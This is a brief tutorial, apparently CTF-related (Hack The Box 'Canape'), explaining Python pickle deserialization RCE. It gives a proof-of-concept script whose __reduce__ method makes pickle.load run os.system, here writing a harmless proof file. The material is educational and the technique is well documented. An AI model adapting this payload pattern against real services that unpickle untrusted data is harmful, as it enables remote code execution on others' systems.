Theory
when load data with pickle.loads method, if data serialized with pickle and contains __reduce__ methods, RCE (Remote Code Execution) can be available. We can also confirm the significance of this vulnerability in the pickle Documents. In official documents, they highly recommend do not load(unpickle) any untrustable data with pickle
PoC
we can demonstrate it easily. just dump data with __reduce__method + pickle, and then load it. python code gonna be like this :
import pickle
import os
class Malicious:
def __reduce__(self):
return (os.system, ('echo "Code Executed" > proof.txt',))
with open('malicious.pkl', 'wb') as f:
pickle.dump(Malicious(), f)
print("malicious data dumped")
print("your directory list :",)
os.system('ls')
print()
input("Enter to Progress")
with open('malicious.pkl', 'rb') as f:
data = pickle.load(f) # RCE occurs here!!
print("your directory list :")
os.system('ls')
print()
print("Read proof.txt")
os.system('cat proof.txt')
CTF Machine
Hack The Box : Canape